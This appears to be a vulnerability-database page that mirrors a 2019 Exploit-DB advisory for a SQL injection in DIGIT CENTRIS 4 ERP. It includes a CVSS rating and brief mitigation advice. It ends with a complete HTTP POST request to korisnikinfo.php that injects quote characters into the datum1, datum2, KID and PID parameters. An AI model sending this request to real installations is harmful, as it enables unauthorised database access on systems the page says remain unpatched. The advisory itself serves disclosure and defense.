DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection

vendor:

CENTRIS 4 ERP

by:

n1x_ [MS-WEB]

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CENTRIS 4 ERP

Affected Version From: Every version

Affected Version To: Every version

Patch Exists: NO

Related CWE:

CPE: a:digit_rs:digit_centris_4_erp

Metasploit:

Other Scripts:

Platforms Tested:

2019

DIGIT CENTRIS 4 ERP – ‘datum1’ SQL Injection

The 'datum1' parameter in the DIGIT CENTRIS 4 ERP software is vulnerable to SQL injection attacks. An attacker can manipulate the 'datum1' parameter to execute arbitrary SQL queries on the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Regularly updating the software to the latest version is also advised.

Source

Exploit-DB raw data:

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID 

# [POST REQUEST]
 
POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 
ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"